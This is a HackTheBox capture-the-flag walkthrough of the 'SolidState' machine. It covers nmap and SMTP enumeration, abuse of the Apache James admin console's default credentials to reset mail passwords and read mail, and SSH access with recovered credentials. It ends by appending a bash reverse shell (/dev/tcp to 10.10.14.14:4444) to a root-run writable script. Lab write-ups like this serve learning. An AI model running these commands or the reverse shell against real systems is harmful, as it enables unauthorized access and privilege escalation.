SolidState Walkthrough HacktheBox
Step 1:
Nmap scan :
Port 4555 cached my eye first:
https://redthunder.blog/2016/11/25/install-and-configure-the-apache-james-mail-server/
Got a public exploit immediately.
Ran the exploit :
It is saying you will get shell once someone logs in, i am waiting btw. let’s see may be the machine is designed in a way that some one logs in after some time giving you shell.
Meanwhile waiting for the shell, let’s enumerate the web application:
From Directory brute force we got some files:
Got something on the README.txt
Welll nothing much.
Enumerating Port 25 SMTP:
nmap — script smtp* -p 25 10.10.10.51 -Pn
We do smtp user enumeration using the below tool:
smtp-user-enum:
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 10.10.10.51
ismtp -h 10.10.10.51:25 -e email.txt //for this we need email list for spoofing mail
I couldn’t get much from the port 25 so went on to the port 4555 again.
Trying to connect to the port 4555 on the 10.10.10.51 using nc
And since from the first exploit on james remote administration tool we Already know that root:root is working let’s do it.
Listing users:
Since there is a command to set password and we know all the usernames, lets reset the passwords.
Reset all the password to test@123
Then i started reading all the mails for each users and the command can be searched online:
CTRL+ and then enter quit to close the connection.
This suggests that james is asking john to restrict mindy’s access and and then send her temporary password to login to her accounts.
May be this is the way to get into mindy’s account may be see what is there.
Any way we still have 2 more users to login and see their mails:
So Mindy had 2 mails, 1st one goes like below:
Credentials:
mindy:P@55W0rd1!2@
Although we got credentials i still want to see what mails the mailadmin user had.
ssh mindy@10.10.10.51
P@55W0rd1!2@
And also, from the Apache james server 2.3.2 exploit we knew it required some body logs in via SSH.
Let’s run that exploit again.
and set up a listener on the port 443, may be we will retry login via ssh into the mindy ‘s account.
We got some sort of shell, let’s enumerate the user.
We got a world writable python script in the /opt directory.
Given that file, I want to see if it’s being run, so I’ll upload PSpy. I’ll start a Python webserver in my Pspy directory, and then grab the file with wget (grabbing the 32 bit version since this machine is 32 bit):
running pspy on the remote host we got to see that the /opt/tmp.py is being run every 3 minutes.
root is running this file.
since this is a writable file let’s insert a bash reverse shell in the python script:
echo “os.system(‘bash -c \”bash -i >& /dev/tcp/10.10.14.14/4444 0>&1\”’)” >> tmp.py
Above command will append our reverse shell to the script and then we will setup a netcat listener on port 4444 to listen to any incoming traffic.
